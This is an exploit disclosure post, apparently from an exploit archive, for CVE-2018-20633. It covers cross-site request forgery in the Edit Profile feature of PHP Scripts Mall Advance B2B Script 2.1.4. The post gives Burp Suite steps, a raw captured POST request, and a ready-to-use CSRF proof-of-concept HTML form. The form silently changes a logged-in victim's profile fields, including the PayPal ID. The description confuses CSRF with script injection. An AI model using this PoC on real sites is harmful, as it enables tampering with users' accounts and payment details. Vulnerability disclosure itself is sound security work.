CVE-2018-20633-PHP Scripts Mall Advance B2B Script 2.1.4 has Cross-Site Request Forgery (CSRF) Vulnerability . -

******************************************
# Exploit Title: PHP Scripts Mall Advance B2B Script 2.1.4 has Cross-Site Request Forgery (CSRF) via the Edit Profile feature.
# Date: 30.12.2018
# Site Title : Entrepreneur B2B Script
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: http://198.38.86.159/~nced2bvda/index.php
# Category: Web Application
# Version: 2.1.4
# Exploit Author: Vikas Chaudhary
# Contact: https://www.facebook.com/profile.php?id=100011287630308
# Web: https://gkaim.com/
# Tested on: Windows 10 -Firefox
# CVE-2018-20633.
**********************************************
# VENDOR SUMMARY :- PHP Scripts Mall Pvt. Ltd. is a professional software selling portal offering wide range of innovative .
PHP Scripts Mall is a leading business and technology firm with 12 years of successful track record in
completion and implementation of numerous projects in various verticals and domains..It has 300 plus PHP scripts ready to buy.

# DESCRIPTION :- The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.
The issue is triggered when an unauthorized input passed via multiple POST and GET parameters are not properly sanitized
before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user’s browser session in context
of an affected site.

**********************************************
PoC:-
1- Open Burp Suite =>make intercept on
2- Go to Software link
4- Click on sign up and register in using your mail , password and so on
5- Verify your mail id
6- Come back to site and sign in
7- Go to Dashboard => Edit Profile and rename according you and click on update
8- Burp will Capture the data
9- Generate CSRF PoC

POST /~nced2bvda/edit-profile.php HTTP/1.1 Host: 198.38.86.159 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://198.38.86.159/~nced2bvda/edit-profile.php Content-Type: application/x-www-form-urlencoded Content-Length: 232 Connection: close Cookie: wordfence_verifiedHuman=6c41985aa51204b2a47a604d655bee2f; PHPSESSID=bfh8q6rqu62qgaf3i33mpmf247 Upgrade-Insecure-Requests: 1 user_type=1&fname=hgi&lname=hj&gender=Male&ph_no=8797979879&mble_no=9098978675&fax_no=987878787&address=jbhh&city=bjhbjhjb&state=Smiths&country=18&zip_code=988777&cmpny_name=kjj&paypal_id=hii%40gmail.com&newsletter=yes&update=Submit

<html> <!– CSRF PoC – generated by Burp Suite Professional –> <body> <script>history.pushState(”, ”, ‘/’)</script> <form action=”http://198.38.86.159/~nced2bvda/edit-profile.php” method=”POST”> <input type=”hidden” name=”user_type” value=”1″ /> <input type=”hidden” name=”fname” value=”Vikas” /> <input type=”hidden” name=”lname” value=”chaudhary” /> <input type=”hidden” name=”gender” value=”Male” /> <input type=”hidden” name=”ph_no” value=”8797979879″ /> <input type=”hidden” name=”mble_no” value=”9098978675″ /> <input type=”hidden” name=”fax_no” value=”987878787″ /> <input type=”hidden” name=”address” value=”jbhh” /> <input type=”hidden” name=”city” value=”bjhbjhjb” /> <input type=”hidden” name=”state” value=”Smiths” /> <input type=”hidden” name=”country” value=”18″ /> <input type=”hidden” name=”zip_code” value=”988777″ /> <input type=”hidden” name=”cmpny_name” value=”kjj” /> <input type=”hidden” name=”paypal_id” value=”hii@gmail.com” /> <input type=”hidden” name=”newsletter” value=”yes” /> <input type=”hidden” name=”update” value=”Submit” /> <input type=”submit” value=”Submit request” /> </form> </body> </html>

Download it’s TXT

Catch me on Github

Read Here all CVE

Please Share this:-

Related Posts